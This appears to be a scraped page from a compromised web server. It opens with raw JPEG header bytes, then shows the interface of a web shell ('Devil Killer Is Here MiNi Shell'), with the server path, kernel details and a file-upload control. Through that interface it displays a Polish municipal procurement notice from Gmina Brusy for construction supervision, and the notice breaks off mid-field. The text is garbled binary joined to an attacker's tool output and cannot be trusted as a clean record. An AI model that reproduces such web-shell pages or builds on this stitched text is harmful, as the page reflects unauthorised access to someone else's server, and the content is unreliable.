JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240924/0051399901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie obowiązków inspektora nadzoru inwestorskiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Brusy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351251</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Na Zaborach 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brusy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-632</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52 39 69 300</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">52 39 69 303</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@brusy.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.brusy.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie obowiązków inspektora nadzoru inwestorskiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5a50e9ed-3fd2-4377-9802-9b60ec8a91f7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00513999</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00065494/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 Budowa nowego boiska wielofunkcyjnego o wymiarach pola gry 12mx24m wraz z zadaszeniem o stałej konstrukcji przy Szkole Podstawowej im. Bł. Ks. Józefa Jankowskiego w Czyczkowach - Nadzór</p> <p class="mb-0">1.3.11 Budowa świetlicy wiejskiej wraz z remizą w miejscowości Główczewice - Nadzór</p> <p class="mb-0">1.3.12 Wsparcie systemu ratownictwa oraz zarządzenia kryzysowego na terenie gminy Brusy – Przebudowa i rozbudowa budynku OSP w Brusach - Nadzór</p> <p class="mb-0">1.3.13 Wsparcie systemu ratownictwa oraz zarządzenia kryzysowego na terenie gminy Brusy - Budowa remizy OSP przy świetlicy wiejskiej w Czapiewicach - Nadzór</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5a50e9ed-3fd2-4377-9802-9b60ec8a91f7 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz poczty elektronicznej pod adresem: um@brusy.pl.<br/>2.	Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3.	Postępowanie można wyszukać ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”).<br/>4.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>6.	Sposób sporządzenia i przekazywania dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (zw. dalej „Rozporządzeniem w sprawie wymagań dla dokumentów elektronicznych).<br/>7.	Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (zw. dalej „Rozporządzeniem w sprawie Krajowych Ram Interoperacyjności”), z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>8.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 Rozporządzenia w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>1)	w formatach danych określonych w przepisach Rozporządzenia w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>2)	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści „Formularza do komunikacji”).<br/>9.	Zamawiający przekazuje link prowadzący bezpośrednio do widoku postępowania oraz Identyfikator (ID) postępowania na Platformie e-Zamówienia w Załączniku nr 5 do SWZ. Dane postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”).<br/>10.	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>11.	Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań, zawiadomień i zadawanie pytań. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”) lub za pomocą poczty elektronicznej na adres e- mail: um@brusy.pl.<br/>12.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>13.	Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>Cd w zakładce Wykaz przedmiotowych środków dowodowych</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">22.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Gmina Brusy, którą reprezentuje Burmistrz Brus, z siedzibą przy ul. Na Zaborach 1, 89-632 Brusy;<br/>	inspektorem ochrony danych osobowych u Administratora jest Magdalena Zarębska, <br/>z którą można kontaktować się e-mailem: iod@brusy.pl; pod numerem telefonu 52-39-69-300 lub pisemnie na adres: Urząd Miejski w Brusach, ul. Na Zaborach 1, 89-632 Brusy;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Pełnienie obowiązków inspektora nadzoru inwestorskiego” prowadzonym w trybie podstawowym;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia <br/>11 września 2019 r. Prawo zamówień publicznych (j.t. Dz.U. z 2024 r. poz. 1320) dalej „ustawa Pzp”; <br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Nr ZP.271.19.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest pełnienie obowiązków inspektora nadzoru inwestorskiego nad robotami budowlanymi realizowanymi w ramach zadania:<br/>Część I „Wsparcie systemu ratownictwa oraz zarządzania kryzysowego na terenie gminy Brusy” - Przebudowa i rozbudowa budynku OSP w Brusach;<br/>2.	Usługa polegała będzie na pełnienie nadzoru inwestorskiego dla następującego zakresu prac:<br/>dla części I*:<br/>roboty budowlane:<br/>- konstrukcje, <br/>- wykończenia zewnętrzne ( dach, stolarka, elewacja, opaska żwirowa),<br/>- roboty wykończeniowe wewnętrzne,<br/>- między ścianą wieży a ścianą istniejącego budynku należy wykonać tymczasowe wydzielenie części objętej przetargiem i wykonać zamknięcie pom. 0.8 i osadzić drzwi DZ2, <br/>- wykonanie termoizolacji ściany zewnętrznej wieży w miejscu, gdzie miałaby być kolejna część budynku, <br/>instalacje sanitarne (ogrzewania, wentylacji, klimatyzacji, wody, kanalizacji sanitarnej, sprężonego powietrza),<br/>instalacje elektryczne (WLZ, prefabrykaty, trasy kablowe, okablowanie, oprawy oświetleniowe, osprzęt elektryczny, instalacja odgromowa i uziemiająca, sieć strukturalna, instalacja SSWIN, instalacja monitoringu CCTV, instalacja domofonowa), przejścia i podłączenia przygotować pod montaż instalacji fotowoltaicznej (instalacja fotowoltaiczna w kolejnym etapie), m.in.<br/>dostawa i montaż wyposażenia,<br/>zagospodarowanie terenu.<br/>3.	Zamówienie obejmuje pełnienie funkcji inspektora nadzoru branży budowlano-konstrukcyjnej, sanitarnej i elektrycznej.<br/>4.	Inspektor nadzoru inwestorskiego pełnić będzie funkcję inspektora nadzoru inwestorskiego w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 ze zm.).<br/>5.	Inspektor nadzoru inwestorskiego będzie wykonywać zlecony nadzór zgodnie z wymaganiami Zamawiającego, dokumentacją projektową, obowiązującymi przepisami i zasadami wiedzy technicznej.<br/>6.	Inspektor nadzoru inwestorskiego realizując zadanie będzie zobowiązany do:<br/>1)	Wyznaczenia inspektora koordynatora, który będzie koordynował pełnienie nadzoru inwestorskiego przez koordynatorów wszystkich branż,<br/>2)	reprezentowania Zamawiającego – Inwestora na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową, w szczególności z projektami budowlanymi, specyfikacjami technicznymi wykonania i odbioru robót, decyzjami, przepisami prawa, w zakresie BHP, normami, zasadami wiedzy technicznej oraz zapisami umowy o roboty budowlane z Wykonawcą Inwestycji;<br/>3)	kontroli prawidłowości zafakturowania wykonanych robót, potwierdzenia faktycznie wykonanych robót oraz usunięcia wad także na żądanie Zamawiającego, kontrolowania rozliczeń budowy;<br/>4)	zatwierdzania materiałów, technologii budowlanych oraz jakości wykonania zgodnie z warunkami umowy zawartej z wykonawcą robót i dokumentacją projektową, w tym również z projektami budowlanymi, projektami budowlanymi wykonawczymi, specyfikacjami technicznymi wykonania i odbioru robót, dla wszystkich robót,<br/>5)	organizowania roboczych narad koordynacyjnych w sprawie prowadzonych robót <br/>z udziałem Zamawiającego i wszystkich niezbędnych stron oraz sporządzania protokołów z tych narad,<br/>6)	opiniowania wniosków wykonawcy robót w sprawie zmiany sposobu wykonania robót budowlanych, w tym zmiany materiałów, urządzeń i technologii,<br/>7)	w razie zaistnienia robót dodatkowych niezwłocznego zgłoszenia na piśmie konieczności wykonania tych robót wraz z uzasadnieniem, a po uzyskaniu akceptacji Zamawiającego, dokonanie uzgodnień z autorem projektu w zakresie wykonania dokumentacji zamiennej lub niezbędnej dokumentacji na roboty dodatkowe,<br/>8)	niezwłocznego informowania Zamawiającego o konieczności wykonania robót odbiegających od założeń w terminie 3 dni od daty stwierdzenia konieczności ich wykonania,<br/>9)	rozstrzygania w porozumieniu z kierownikiem budowy i przedstawicielem Zamawiającego wątpliwości natury technicznej powstałych w trakcie realizacji zamówienia;<br/>10)	potwierdzania faktycznie wykonanych robót oraz usunięcia wad;<br/>11)	dokonywania odbiorów częściowych robót zanikających i ulegających zakryciu;<br/>12)	sprawdzania i zatwierdzanie operatu kolaudacyjnego przed odbiorem końcowym;<br/>13)	uczestnictwa w odbiorze końcowym inwestycji i przyjmowania od wykonawców wszelkich dokumentów wymaganych w terminie odbioru (w tym sprawdzenia kompletności dokumentów, atestów, aprobat technicznych, protokołów pomiarów, DTR, geodezyjnej inwentaryzacji powykonawczej obiektów i ich części, dziennika budowy oraz innych), niezbędnych do odbioru końcowego całego zadania;<br/>14) wydawania kierownikowi budowy lub kierownikom robót poleceń, potwierdzonych wpisem do dziennika budowy, dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienie ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych i urządzeń technicznych;<br/>15)	żądania od kierownika budowy lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z dokumentacją projektową lub pozwoleniem na budowę;<br/>16)	bieżącej kontroli ilości i terminowości wykonywanych robót;<br/>17)	podejmowania działań w celu dotrzymania terminu realizacji inwestycji;<br/>18)	po rozpoczęciu robót budowlanych nadzorowania budowy z taką częstotliwością oraz w takich godzinach, aby była zapewniona skuteczność nadzoru, a w sytuacjach wyjątkowych niezwłocznie, gdy obecność inspektora nadzoru będzie nieodzowna, najpóźniej w następnym dniu od powiadomienia, a w szczególności:<br/>a)	co najmniej jednej wizyty Inspektora nadzoru inwestorskiego w odpowiednich specjalnościach uprawnionego do nadzorowania robót na budynku w każdym tygodniu podczas realizacji robót danej branży, <br/>b)	niezależnie od wizyt określonych w pkt. 18) lit a) konieczna obecność podczas odbiorów częściowych i odbioru końcowego Inspektora Nadzoru inwestorskiego <br/>w specjalności odpowiedniej do zrealizowanych robót będących przedmiotem odbioru częściowego lub końcowego. <br/>c)	wizyty w nagłych sytuacjach na budowie - na wezwanie Zamawiającego <br/>lub Wykonawcy robót stawienie się w terminie nie dłuższym niż 1 dzień <br/>(24 godziny) od wezwania Zamawiającego, <br/>d)	wizyty w przypadku powstania katastrofy budowlanej w ciągu 2 godzin <br/>od wezwania Wykonawcy robót lub Zamawiającego;<br/>19)	kontrolowania prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót;<br/>20)	informowania na bieżąco Zamawiającego o przebiegu prac, o napotkanych problemach i podjętych działaniach zaradczych mających na celu ich przezwyciężenie (wczesne ostrzeganie, zwłaszcza w sprawach mogących wpłynąć na termin zakończenia robót);<br/>21)	prowadzenia dokumentacji fotograficznej inwestycji w szczególności robót ulegających zakryciu, wykonanych wadliwie lub z opóźnieniem i udostępnianie jej na każde żądanie Zamawiającego;<br/>22)	udziału w przekazaniu placu budowy;<br/>23)	uczestnictwa w okresie gwarancji i rękojmi przy przeglądach gwarancyjnych na zawiadomienie Zamawiającego, potwierdzenia usunięcia wad i usterek w okresie gwarancji i rękojmi bez dodatkowego wynagrodzenia;<br/>24)	wykonywania innych czynności, przewidzianych dla inspektora nadzoru w umowie z wykonawcą inwestycji;<br/>25)	wykonania czynności odnoszących się do realizacji uprawnień z tytułu rękojmi za wady wykonanych robót;<br/>26)	przyjęcia od kierownika budowy dokumentacji powykonawczej, dziennika budowy oraz po uprzednim ich sprawdzeniu przekazania ich Zamawiającemu,<br/>27)	przygotowania w porozumieniu z Wykonawcą robót zestawienia wybudowanej infrastruktury (długości, powierzchnie, szt., itp.).<br/>7.	Bez zgody Zamawiającego, Inspektor Nadzoru nie może wprowadzić żadnych zmian w zakresie realizacji umowy na wykonanie robót budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: 